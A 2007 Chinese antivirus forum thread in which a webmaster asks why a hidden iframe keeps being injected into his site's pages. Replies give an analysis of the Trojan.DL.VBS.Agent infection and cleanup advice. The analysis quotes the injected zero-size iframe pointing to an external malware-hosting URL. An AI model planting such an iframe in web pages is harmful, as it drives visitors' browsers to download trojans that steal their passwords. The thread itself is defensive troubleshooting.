瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 网站被嵌入iframe代码,正版瑞星竟然没有找到任何病毒,木马

1   1  /  1  页   跳转

网站被嵌入iframe代码,正版瑞星竟然没有找到任何病毒,木马

网站被嵌入iframe代码,正版瑞星竟然没有找到任何病毒,木马

大家好,我的网站页面在被打开时都会被嵌入<iframe src="*.*" width=0 >width=0 height=0></iframe>,瑞星会提示发现Trojan.DL.VBS.Agent.cex这个病毒!
我在网站服务器上做过如下检查:
1:察看源码,发现源码中并不包含<iframe src="*.*" width=0 >width=0 height=0></iframe>这样的代码
2:只要把源码文件中的<head>标志和</head>删除,就不会再被嵌入iframe代码了
3:我并没有发现网页别修改的痕迹!用最新的瑞星扫描服务器,没有找到任何东西!
很郁闷了,到底是怎么回事!

在网上搜索了很久,很久,没有一个好的解决办法?

最新的正版瑞星杀毒软件找不到丝毫的问题,好失望呀!
最后编辑2007-03-13 12:01:24
分享到:
gototop
 

关注~~~
gototop
 

不一定是病毒,恶意软件也会创建病毒的
gototop
 

大家好,我的网站页面在被打开时都会被嵌入<iframe src="*.*" width=0 >width=0 height=0></iframe>,瑞星会提示发现Trojan.DL.VBS.Agent.cex这个病毒!
我在网站服务器上做过如下检查:
1:察看源码,发现源码中并不包含<iframe src="*.*" width=0 >width=0 height=0></iframe>这样的代码
2:只要把源码文件中的<head>标志和</head>删除,就不会再被嵌入iframe代码了,网页也可以正常的打开了
3:我并没有发现网页别修改的痕迹!用最新的瑞星扫描服务器,没有找到任何东西!
很郁闷了,到底是怎么回事!

在网上搜索了很久,很久,没有一个好的解决办法?

最新的正版瑞星杀毒软件找不到丝毫的问题,好失望呀!
gototop
 

Trojan.DL.VBS.Agent病毒分析2007-02-07 20:09Trojan.DL.VBS.Agent病毒是由于网友访问的网站服务器上被放置了iframe,指向一个发送木马的网站。其主要问题在服务器,它会使所有来访者遇到可能的威胁。

现在放这些病毒的破坏者只是在网站的主页或conn.asp文件中加入iframe代码,想利用网站,使访问者的浏览器下载他们的恶意代码,然后他们在访问者的机上搞破坏,如偷游戏密码、偷盗QQ号码、盗取网上银行密码等等等。

应对方案:

对普通用户来说,只要安装了先进的杀毒软件,访问这个网站就会报警,报告发现某某病毒,然后杀除病毒。以瑞星为例,需要将病毒库升级到18.51.41以上版本。同时要下载安装最新的IE补丁,建议在网络不拥挤的早上进行可行性的升级。还有,需要用杀毒软件杀除在缓存中的病毒,清空缓存,这样就可以防范这类木马病毒了。木马克星,反间谍专家等木马专杀软件也可以配合已有的杀病毒软件进行工作。

对二级网站用户来说,根据病毒特点,需要仔细进行首页代码的查询,可以发现index.htm或者default.asp,index.asp这类首页文件修改日期为06.10.28,其页面末尾一般有以下代码:

<iframe src="http://www.17hk.com/ziliao/alexa.asp" width="0" height="0" frameborder="0"></iframe>

这就是病毒嵌入的类似广告的插入代码,网页启动时,这个链接网站随即启动,并启动其恶意代码对有IE漏洞的本地用户进行木马植入或者侵害。解决办法就是清除掉它,重新覆盖上传即可。

少数静态网页还可能被嵌入了不明的script代码(实际上也是病毒执行脚本),这也需要有经验的二级网站维护者仔细检查并加以清除。

二级网站用户维护须知:

目前,网络中心已将所有home服务器上的二级网站首页做了初步检查,清除了部分嵌入代码,并将服务器进行了适当升级。

网络中心在这里提醒各二级网站维护者,随着当前病毒特别是木马病毒的进展,除了要保证网站内容的安全性外,还要格外注意网站代码的安全性,尤其是套用不明的外部代码的时候,必须保证对源代码进行审查,不公开的代码模块原则上不能采用。再发现带有木马代码的网站,原则上,网络中心将停止其主页发布,取消主页空间。也希望各二级单位积极配合网络中心,对网站进一步做自查工作,以提高网站安全性。
gototop
 

o坤义o
首先要谢谢你!

你发的内容我都看过,没有用的!

有没有瑞星的专家在这里呀,告诉一个好的方法呀!!!!
gototop
 

瑞星的专家都在干吗呢?
都睡着了吗????
gototop
 

4楼说的已经说很详细了,病毒缘由,解决方案都清清楚楚.是不是楼主方法不对啊?硬说没有用,别人也没折的啦.
gototop
 

我把服务器重新格式化安装,可是别人打开我们的网站依然会被嵌入<iframe>代码,但是我在局域网打开我们的网站很正常!
超级郁闷!
gototop
 

恶意代码 嵌在 数据库里面呵呵

不一定 修改index文件的
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT